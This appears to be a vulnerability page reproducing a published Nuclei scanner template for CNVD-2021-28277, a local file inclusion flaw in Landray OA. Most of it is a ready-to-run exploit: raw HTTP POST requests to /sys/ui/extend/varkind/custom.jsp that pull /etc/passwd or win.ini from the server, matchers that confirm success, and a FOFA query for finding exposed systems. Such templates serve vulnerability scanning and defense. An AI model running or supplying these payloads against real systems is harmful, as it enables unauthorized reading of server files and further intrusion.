漏洞描述
Landray-OA is susceptible to local file inclusion.
CNVD-2021-28277: Landray-OA - Local File Inclusion
PoC代码[已公开]
id: CNVD-2021-28277
info:
name: Landray-OA - Local File Inclusion
author: pikpikcu,daffainfo
severity: high
description: Landray-OA is susceptible to local file inclusion.
reference:
- https://www.aisoutu.com/a/1432457
- https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-22
cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:*
metadata:
max-request: 2
fofa-query: app="Landray OA system"
product: landray_office_automation
vendor: landray
tags: cnvd,cnvd2021,landray,lfi
http:
- raw:
- |
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
var={"body":{"file":"file:///etc/passwd"}}
- |
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
var={"body":{"file":"file:///c://windows/win.ini"}}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "for 16-bit app support"
condition: or
- type: status
status:
- 200
# digest: 4a0a00473045022100e3e0ec3a61cee2d6bca582a418beae65e44b0d9593909579011d81390721efcf02200e0c812a6b14dbaf71b840aef52252c72823b4251c92b2bb377b851116f8ffb0:922c64590222798bb761d5b6d8e72950